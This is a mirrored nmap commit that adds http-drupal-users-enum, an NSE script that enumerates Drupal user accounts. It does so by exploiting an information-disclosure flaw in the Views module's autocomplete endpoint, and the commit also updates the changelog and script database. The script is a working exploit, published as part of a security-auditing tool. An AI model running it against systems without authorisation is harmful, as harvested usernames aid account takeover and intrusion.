mirror of
https://github.com/nmap/nmap.git
synced 2025-12-11 02:09:03 +00:00
o [NSE] Added new script http-drupal-users-enum, which enumerates all available
Drupal user accounts by exploiting a vulnerability in the Views module. [Hani Benhabiles]
This commit is contained in:
@@ -1,5 +1,9 @@
|
|||||||
# Nmap Changelog ($Id$); -*-text-*-
|
# Nmap Changelog ($Id$); -*-text-*-
|
||||||
|
|
||||||
|
o [NSE] Added new script http-drupal-users-enum, which enumerates all available
|
||||||
|
Drupal user accounts by exploiting a vulnerability in the Views module.
|
||||||
|
[Hani Benhabiles]
|
||||||
|
|
||||||
o [NSE] Added new script broadcast-ataoe-discover, which discovers ATA over
|
o [NSE] Added new script broadcast-ataoe-discover, which discovers ATA over
|
||||||
Ethernet capable devices through LAN ethernet broadcasts. [Patrik Karlsson]
|
Ethernet capable devices through LAN ethernet broadcasts. [Patrik Karlsson]
|
||||||
|
|
||||||
|
|||||||
78
scripts/http-drupal-users-enum.nse
Normal file
78
scripts/http-drupal-users-enum.nse
Normal file
@@ -0,0 +1,78 @@
|
|||||||
|
description = [[
|
||||||
|
Enumerates Drupal users by exploiting a an information disclosure vulnerability
|
||||||
|
in Views, Drupal's most popular module.
|
||||||
|
|
||||||
|
Requests to admin/views/ajax/autocomplete/user/STRING return all usernames that
|
||||||
|
begin with STRING. The script works by iterating STRING over letters to extract
|
||||||
|
all usernames.
|
||||||
|
|
||||||
|
For more information,see:
|
||||||
|
* http://www.madirish.net/node/465
|
||||||
|
]]
|
||||||
|
|
||||||
|
---
|
||||||
|
-- @usage
|
||||||
|
-- nmap --script=http-drupal-users --script-arg http-drupal-users.root="/path/" <targets>
|
||||||
|
--
|
||||||
|
-- @output
|
||||||
|
-- PORT STATE SERVICE REASON
|
||||||
|
-- 80/tcp open http syn-ack
|
||||||
|
-- | http-drupal-users:
|
||||||
|
-- | admin
|
||||||
|
-- | alex
|
||||||
|
-- | manager
|
||||||
|
-- |_ user
|
||||||
|
--
|
||||||
|
-- @args http-drupal-users.root base path. Defaults to "/"
|
||||||
|
|
||||||
|
author = "Hani Benhabiles"
|
||||||
|
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
|
||||||
|
categories = {"discovery", "intrusive"}
|
||||||
|
|
||||||
|
require 'http'
|
||||||
|
require 'stdnse'
|
||||||
|
require 'shortport'
|
||||||
|
require 'json'
|
||||||
|
|
||||||
|
portrule = shortport.http
|
||||||
|
|
||||||
|
action = function(host, port)
|
||||||
|
local root = stdnse.get_script_args("http-drupal-users.root") or "/"
|
||||||
|
local character, allrequests,user
|
||||||
|
local result = {}
|
||||||
|
|
||||||
|
-- ensure that root ends with a trailing slash
|
||||||
|
if ( not(root:match(".*/$")) ) then
|
||||||
|
root = root .. "/"
|
||||||
|
end
|
||||||
|
|
||||||
|
-- characters that usernames may begin with
|
||||||
|
-- + is space in url
|
||||||
|
local characters = "abcdefghijklmnopqrstuvwxyz.-123456789+"
|
||||||
|
|
||||||
|
for character in characters:gmatch(".") do
|
||||||
|
-- add request to pipeline
|
||||||
|
allrequests = http.pipeline_add(root.. 'admin/views/ajax/autocomplete/user/' .. character, nil, allrequests, "GET")
|
||||||
|
end
|
||||||
|
|
||||||
|
-- send requests
|
||||||
|
local pipeline_responses = http.pipeline_go(host, port, allrequests)
|
||||||
|
if not pipeline_responses then
|
||||||
|
stdnse.print_debug(1, "No answers from pipelined requests", SCRIPT_NAME)
|
||||||
|
return nil
|
||||||
|
end
|
||||||
|
|
||||||
|
for i, response in pairs(pipeline_responses) do
|
||||||
|
if response.status == 200 then
|
||||||
|
local status, info = json.parse(response.body)
|
||||||
|
if status then
|
||||||
|
for _,user in pairs(info) do
|
||||||
|
if user ~= "Anonymous" then
|
||||||
|
table.insert(result, user)
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
return stdnse.format_output(true, result)
|
||||||
|
end
|
||||||
@@ -118,6 +118,7 @@ Entry { filename = "http-cors.nse", categories = { "default", "discovery", "safe
|
|||||||
Entry { filename = "http-date.nse", categories = { "discovery", "safe", } }
|
Entry { filename = "http-date.nse", categories = { "discovery", "safe", } }
|
||||||
Entry { filename = "http-default-accounts.nse", categories = { "auth", "discovery", "safe", } }
|
Entry { filename = "http-default-accounts.nse", categories = { "auth", "discovery", "safe", } }
|
||||||
Entry { filename = "http-domino-enum-passwords.nse", categories = { "auth", "intrusive", } }
|
Entry { filename = "http-domino-enum-passwords.nse", categories = { "auth", "intrusive", } }
|
||||||
|
Entry { filename = "http-drupal-users-enum.nse", categories = { "discovery", "intrusive", } }
|
||||||
Entry { filename = "http-email-harvest.nse", categories = { "discovery", "safe", } }
|
Entry { filename = "http-email-harvest.nse", categories = { "discovery", "safe", } }
|
||||||
Entry { filename = "http-enum.nse", categories = { "discovery", "intrusive", "vuln", } }
|
Entry { filename = "http-enum.nse", categories = { "discovery", "intrusive", "vuln", } }
|
||||||
Entry { filename = "http-favicon.nse", categories = { "default", "discovery", "safe", } }
|
Entry { filename = "http-favicon.nse", categories = { "default", "discovery", "safe", } }
|
||||||
|
|||||||
Reference in New Issue
Block a user